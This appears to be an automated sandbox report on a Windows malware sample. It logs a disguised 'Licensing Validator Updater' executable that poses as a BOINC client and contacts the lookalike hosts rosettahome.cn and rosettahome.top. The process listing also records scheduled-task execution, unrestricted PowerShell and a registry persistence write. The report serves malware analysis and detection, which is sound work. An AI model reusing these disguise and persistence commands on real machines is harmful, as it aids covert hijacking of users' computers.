    <cpu_req_instances>0.000000</cpu_req_instances>
    <estimated_delay>0.000000</estimated_delay>
    <client_cap_plan_class>1</client_cap_plan_class>
    <platform_name>windows_x86_64</platform_name>
    <alt_platform>
        <name>windows_intelx86</name>
    </al [TRUNCATED]
Jan 14, 2025 20:46:41.473403931 CET | 1088 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 19:46:41 GMT
                                                                                                                                                                                                                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 908
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.16 | 49820 | 104.238.61.8 | 80 | 1276 | C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 20:46:43.241584063 CET | 206 | OUT | GET /rosettahome/notices.php?userid=1&auth=1_1a362b2ad50985e203845fe44682096e HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: rosettahome.cn
                                                                                                                                                                                                                                                                                                                                                      User-Agent: BOINC client (windows_x86_64 8.0.2)
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: deflate, gzip
Jan 14, 2025 20:46:43.827482939 CET | 505 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 19:46:43 GMT
                                                                                                                                                                                                                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                      Expires: Tue, 14 Jan 2025 19:46:43 GMT
                                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 14 Jan 2025 19:46:43 GMT
                                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 232
                                                                                                                                                                                                                                                                                                                                                      Content-Type: application/xml
Jan 14, 2025 20:46:48.538058996 CET | 146 | OUT | GET /rosettahome/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: rosettahome.cn
                                                                                                                                                                                                                                                                                                                                                      User-Agent: BOINC client (windows_x86_64 8.0.2)
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: deflate, gzip
Jan 14, 2025 20:46:48.701327085 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 19:46:48 GMT
                                                                                                                                                                                                                                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 UTC
                                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 14 Jan 2025 19:46:48 UTC
                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                      Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 1512
                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
Jan 14, 2025 20:46:48.701350927 CET | 646 | IN | (response body, continued)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.16 | 49822 | 104.238.61.8 | 80 | 1276 | C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
Timestamp | Bytes transferred | Direction | Data
Jan 14, 2025 20:46:56.071654081 CET | 6731 | OUT | POST /rosettahome_cgi/cgi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                      Host: rosettahome.top
                                                                                                                                                                                                                                                                                                                                                      User-Agent: BOINC client (windows_x86_64 8.0.2)
                                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                      Content-type: text/xml
                                                                                                                                                                                                                                                                                                                                                      Content-Length: 6530
Data Ascii: <scheduler_request> <authenticator>1_dfdacac1d4e91a74e91cfc18f518e1de</authenticator> <hostid>17205</hostid> <rpc_seqno>0</rpc_seqno> <core_client_major_version>8</core_client_major_version> <core_client_minor_version>0</core_client_minor_version> <core_client_release>2</core_client_release> <resource_share_fraction>1.000000</resource_share_fraction> <rrs_fraction>1.000000</rrs_fraction> <prrs_fraction>1.000000</prrs_fraction> <duration_correction_factor>1.000000</duration_correction_factor> <allow_multiple_clients>0</allow_multiple_clients> <sandbox>0</sandbox> <dont_send_work>0</dont_send_work> <work_req_seconds>207360.000000</work_req_seconds> <cpu_req_secs>207360.000000</cpu_req_secs> <cpu_req_instances>4.000000</cpu_req_instances> <estimated_delay>0.000000</estimated_delay> <client_cap_plan_class>1</client_cap_plan_class> <platform_name>windows_x86_64</platform_name> <alt_platform> <name>windows_intelx86</ [TRUNCATED]
Jan 14, 2025 20:46:56.831449986 CET | 871 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 19:46:56 GMT
Server: Apache/2.4.52 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 691
Content-Type: text/xml


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.16 | 49710 | 216.58.206.36 | 443 | 6592 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 19:45:09 UTC | 627 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2025-01-14 19:45:10 UTC | 1266 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 19:45:10 GMT
Pragma: no-cache
Expires: -1
Cache-Control: no-cache, must-revalidate
Content-Type: text/javascript; charset=UTF-8
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-0V9aejrY0FtcQ3dGJQ8yxA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
Accept-CH: Sec-CH-Prefers-Color-Scheme
Accept-CH: Sec-CH-UA-Form-Factors
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Content-Disposition: attachment; filename="f.txt"
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2025-01-14 19:45:10 UTC | 124 | IN | Data Ascii: 338)]}'["",["powerball lottery numbers","nfl kansas city chiefs","lincoln wheat penny rare coin","warzone update patch no
2025-01-14 19:45:10 UTC | 707 | IN | Data Ascii: tes","moon mars occultation","sb mowing gofundme beth","east tennessee school closings","jpmorgan chase bank"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","goo
2025-01-14 19:45:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.16 | 49715 | 216.58.206.36 | 443 | 6592 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 19:45:10 UTC | 530 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2025-01-14 19:45:11 UTC | 1018 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Version: 714120572
                                                                                                                                                                                                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 19:45:10 GMT
                                                                                                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.16 | 49716 | 216.58.206.36 | 443 | 6592 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 19:45:10 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
Host: www.google.com
Connection: keep-alive
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
2025-01-14 19:45:11 UTC | 933 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                      Version: 714120572
                                                                                                                                                                                                                                                                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                                                      Date: Tue, 14 Jan 2025 19:45:10 GMT
                                                                                                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
2025-01-14 19:45:11 UTC | 35 | IN | Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 1d)]}'{"update":{"promos":{}}}
2025-01-14 19:45:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0



                                                                                                                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                                                                                                                      Start time:14:44:58
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7c04f0000
                                                                                                                                                                                                                                                                                                                                                      File size:71'680 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                                                                                                                                      Start time:14:45:04
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7916a0000
                                                                                                                                                                                                                                                                                                                                                      File size:676'768 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                                                                                                                      Start time:14:45:05
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7916a0000
                                                                                                                                                                                                                                                                                                                                                      File size:676'768 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                                                      Has exited:false

Target ID:4
Start time:14:45:05
Start date:14/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe"
Imagebase:0x7ff7f9810000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:5
Start time:14:45:07
Start date:14/01/2025
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1976,i,16268402640929927935,18277506038604385706,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:0x7ff7f9810000
File size:3'242'272 bytes
MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:6
Start time:14:45:08
Start date:14/01/2025
Path:C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2252 -prefMapHandle 2248 -prefsLen 25250 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7aecee2f-7929-4b59-a925-084c7a102dc1} 876 "\\.\pipe\gecko-crash-server-pipe.876" 1ca7b26d510 socket
Imagebase:0x7ff7916a0000
File size:676'768 bytes
MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:8
Start time:14:45:09
Start date:14/01/2025
Path:C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3848 -parentBuildID 20230927232528 -prefsHandle 2524 -prefMapHandle 2520 -prefsLen 25402 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a34be315-eacf-430b-91ce-f68b9a07f9bb} 876 "\\.\pipe\gecko-crash-server-pipe.876" 1ca0b1e6b10 rdd
Imagebase:0x7ff7916a0000
File size:676'768 bytes
MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:10
Start time:14:45:16
Start date:14/01/2025
Path:C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5460 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5388 -prefMapHandle 5424 -prefsLen 33076 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {12e0202d-ddff-4bd9-9b19-74adcc901a75} 876 "\\.\pipe\gecko-crash-server-pipe.876" 1ca1b118b10 utility
Imagebase:0x7ff7916a0000
File size:676'768 bytes
MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:11
Start time:14:45:22
Start date:14/01/2025
Path:C:\Program Files\7-Zip\7zG.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\527\" -spe -an -ai#7zMap22896:62:7zEvent18695
Imagebase:0x770000
File size:700'416 bytes
MD5 hash:50F289DF0C19484E970849AAC4E6F977
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:16
Start time:14:45:27
Start date:14/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\cmd.exe"
Imagebase:0x7ff6fd780000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:17
Start time:14:45:27
Start date:14/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6684c0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:14:45:33
Start date:14/01/2025
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:0x7ff7582a0000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:21
Start time:14:45:33
Start date:14/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6684c0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:22
Start time:14:45:42
Start date:14/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\cmd.exe"
Imagebase:0x7ff6fd780000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:23
Start time:14:45:42
Start date:14/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6684c0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:24
Start time:14:45:51
Start date:14/01/2025
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -ep Unrestricted
Imagebase:0x7ff7582a0000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:28
Start time:14:46:18
Start date:14/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\cmd.exe"
Imagebase:0x7ff6fd780000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:29
Start time:14:46:18
Start date:14/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6684c0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:30
Start time:14:46:21
Start date:14/01/2025
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\schtasks.exe" /run /tn CleanUpMgrTask_1659166102
Imagebase:0x7ff7dfbc0000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:14:46:21
Start date:14/01/2025
Path:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe" --detach_console
Imagebase:0x7ff68cfc0000
File size:5'900'128 bytes
MD5 hash:760F00E30887017CDEA9809FD1C38E52
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:14:46:24
Start date:14/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6684c0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:33
Start time:14:46:24
Start date:14/01/2025
Path:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe" -detach_phase_two
Imagebase:0x7ff68cfc0000
File size:5'900'128 bytes
MD5 hash:760F00E30887017CDEA9809FD1C38E52
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:false

Target ID:34
Start time:14:46:24
Start date:14/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6684c0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                      Target ID:35
                                                                                                                                                                                                                                                                                                                                                      Start time:14:46:24
                                                                                                                                                                                                                                                                                                                                                      Start date:14/01/2025
                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft" -Name ExpirienceHost -Value 1
                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7582a0000
                                                                                                                                                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                      Target ID:36
